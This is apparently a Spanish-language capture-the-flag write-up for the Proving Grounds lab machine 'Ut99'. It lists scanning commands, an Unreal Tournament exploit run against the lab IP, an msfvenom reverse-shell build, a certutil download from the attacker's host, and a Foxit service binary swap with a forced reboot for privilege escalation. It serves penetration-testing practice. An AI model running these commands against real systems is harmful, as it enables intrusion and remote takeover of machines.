Cu3rv0x
Ut99

Ut99


ProvingGrounds Windows

nmap -A -p- -oA ut99 192.168.198.44 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA ut99 192.168.198.44

nmap -sU -O -p- -oA ut99-udp 192.168.198.44

nikto -h 192.168.198.44:80

ssh_command.

ssh_command.

whatweb http://192.168.198.44

ssh_command.

ftp 192.168.198.44

Nos logeamos con anonymous pero no funciona

ssh_command.

http://192.168.198.44

ssh_command.

searchsploit Unreal

searchsploit -m 16415.pl

https://www.exploit-db.com/exploits/16145

ssh_command.

perl 16145.pl 192.168.198.44 7778 192.168.49.198 80

nc -lvnp 80

ssh_command.

type local.txt

ssh_command.

dir

Hacemos un dir en FTP y vemos Foxit

ssh_command.

searchsploit -m 36390.txt

ssh_command.

Hacemos un dir en Program Files (x86) y vemos Foxit

ssh_command.

sc qc FoxitCloudUpdateService

ssh_command.

Creamos un archivo hola.txt para ver si tenemos permisos

ssh_command.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.198 LPORT=80 -f exe -o Foxit.exe

ssh_command.

python3 -m http.server 80

certutil.exe -f -urlcache -split http://192.168.49.198/Foxit.exe

ssh_command.

shutdown.exe -r -f -t 1

nc -lvnp 80

ssh_command.

whoami

ssh_command.

© 2025 Cu3rv0x